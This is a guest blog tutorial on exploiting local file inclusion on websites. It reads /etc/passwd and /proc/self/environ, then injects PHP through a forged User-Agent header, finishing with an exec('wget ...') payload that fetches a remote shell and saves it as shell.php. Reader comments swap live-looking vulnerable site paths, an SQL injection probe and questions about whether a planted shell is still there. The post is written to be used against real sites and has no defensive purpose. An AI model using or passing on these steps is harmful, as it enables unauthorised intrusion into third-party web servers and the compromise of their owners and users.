images (284×177)Lets Starts 

Few Things You Need to Start 
1) Site vulnerable to LFI ( )
2) Remote shell ( http://www.yourhosting/urshell.txt
3) User-Agent switcher (
4) Mozilla Firefox Browser 

Lfimap-icon.png (74×74)First of all see if your site is vulnerable to LFI (I'm not going to explain how to find it or exploit it)
Try to open etc/passwd

Ok fine...We can open etc/passwd
Now type proc/self/environ


Now download and install User-Agent switcher.
Go to Tools > Default User-Agent > Edit User Agents
You will get this window.
Now make new user-agentGo to New > New User-Agent
You will get something like this:

<?php phpinfo();?>
Now leave everything as it is exept description and user-agent.
In description enter name of it (Mine is phpinfo)
In User-Agent paste this in there.
Select your User-Agent in Tools > Default User Agent > PHP Info (Or whatever you User Agent is called)

Go to your site and refresh it.
You should get something like this in your site.

Now search for "disable_functions" (Ctrl+F Search function)
Mine is
disable_functions     | no value    | no value
That is good.We can spawn our shell now!
Now go back and edit your User-Agent.
Change "User-Agent" to:
<?exec('wget -O shell.php');?>

(What this function do?. It downloads shell in .txt format and renames it as shell.php)

Save it and refresh your site.

Go to (Mine is )

Voila,we have our shell up.
Demo websites :)

About The Author : This Post was Written by AV, catch him on his Blog, If You are aslo Intrested in writing a Guest Post then visit this Page


  1. nice Tutorial(MaC)

  2. really nice1....

  3. example site fix now

  4. is the shell still there??

  5. not fixed ... Try sql injection content1.php?mainmenu_id=54'

  6. !lfi /index.php?option=com_myblog&Itemid=12&task= "com_myblog"

  7. This comment has been removed by a blog administrator.


If you're having issues, Please leave an email address I can contact you on -
I advise you to also "subscribe to the comment feed" and get email updates when I respond to your question.

Hyperlinks are not allowed, Spam/advertising comments will NEVER BE TOLERATED and will be deleted immediately!

Thanks for reading,